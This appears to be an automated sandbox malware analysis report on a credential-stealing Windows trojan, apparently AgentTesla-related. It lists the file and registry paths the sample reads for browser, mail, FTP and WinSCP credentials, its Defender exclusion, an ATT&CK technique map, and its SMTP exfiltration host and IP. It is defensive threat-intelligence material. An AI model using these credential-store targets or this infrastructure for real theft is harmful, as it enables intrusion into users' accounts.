                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Users\user\Desktop\QFEWElNtpn.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QFEWElNtpn.exe PID: 5960, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.3936bc8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.390dba8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.QFEWElNtpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.390dba8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3358494452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QFEWElNtpn.exe PID: 5960, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QFEWElNtpn.exe PID: 5960, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.3936bc8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.390dba8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.QFEWElNtpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.390dba8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3358494452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      111
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      Credentials in Registry
                      1
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                      Virtualization/Sandbox Evasion
                      Security Account Manager141
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares2
                      Data from Local System
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Timestomp
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567511 Sample: QFEWElNtpn.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 28 mail.mbarieservicesltd.com 2->28 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 8 other signatures 2->38 8 QFEWElNtpn.exe 4 2->8         started        signatures3 process4 file5 26 C:\Users\user\AppData\...\QFEWElNtpn.exe.log, ASCII 8->26 dropped 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->40 42 Adds a directory exclusion to Windows Defender 8->42 12 QFEWElNtpn.exe 2 8->12         started        16 powershell.exe 23 8->16         started        18 QFEWElNtpn.exe 8->18         started        20 QFEWElNtpn.exe 8->20         started        signatures6 process7 dnsIp8 30 mail.mbarieservicesltd.com 199.79.62.115, 49710, 587 PUBLIC-DOMAIN-REGISTRYUS United States 12->30 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->44 46 Tries to steal Mail credentials (via file / registry access) 12->46 48 Tries to harvest and steal ftp login credentials 12->48 50 Tries to harvest and steal browser information (history, passwords, etc) 12->50 52 Loading BitLocker PowerShell Module 16->52 22 WmiPrvSE.exe 16->22         started        24 conhost.exe 16->24         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      QFEWElNtpn.exe74%ReversingLabsWin32.Trojan.Leonem
                      QFEWElNtpn.exe100%AviraTR/AD.Nekark.zfyrd
                      QFEWElNtpn.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.mbarieservicesltd.com
                      199.79.62.115
                      truefalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8XQFEWElNtpn.exe, 00000000.00000002.2138905125.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://tempuri.org/DataSet1.xsdQFEWElNtpn.exefalse
                            high
                            http://mail.mbarieservicesltd.comQFEWElNtpn.exe, 00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              199.79.62.115
                              mail.mbarieservicesltd.comUnited States
                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1567511
                              Start date and time:2024-12-03 16:29:51 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 44s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:QFEWElNtpn.exe
                              renamed because original name is a hash value
                              Original Sample Name:b612dbe8660225d074563250626237783bfdeedf5bb38d5af1e2789690787fc8.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@11/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 21
                              • Number of non-executed functions: 1
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: QFEWElNtpn.exe
                              TimeTypeDescription
                              10:30:42API Interceptor41x Sleep call for process: QFEWElNtpn.exe modified
                              10:30:44API Interceptor20x Sleep call for process: powershell.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              199.79.62.115SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                  LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                      Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                        Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                          PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                            INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                              LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                                1364. 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  mail.mbarieservicesltd.comSoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                  • 199.79.62.115
                                                  Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                  • 199.79.62.115
                                                  Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  PO ALJAT-5804-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  INQ#84790.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  LPO24.0524.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PUBLIC-DOMAIN-REGISTRYUSSoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 199.79.62.115
                                                  new booking 9086432659087.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 162.251.80.30
                                                  rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                  • 103.76.231.42
                                                  LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 199.79.62.115
                                                  RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 162.251.80.30
                                                  Quote5000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                  • 199.79.62.115
                                                  Quote1000AFC.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                  • 199.79.62.115
                                                  shipping doc -GY298035826.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 162.251.80.30
                                                  New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 208.91.199.225
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\QFEWElNtpn.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.379460230152629
                                                  Encrypted:false
                                                  SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:fLHyIFKL3IZ2KRH9OugQs
                                                  MD5:D951BCD234F0E41C2E1282F2D92650E3
                                                  SHA1:5116D690A37C280737C348ECC2EFC02DE8C517C9
                                                  SHA-256:3E840928EC1CEB87110E9BD98F08738621389E2575E32954A6B01B8F4DCE441C
                                                  SHA-512:F37E142A1CB2C6D00C7E8F13DE81D7110A59FD1CC2F764BCAB46C97D2C99871C497422E545B2D997999DA70D755CFCED7B1D49AFBF907AF0660FD60C3E64382E
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
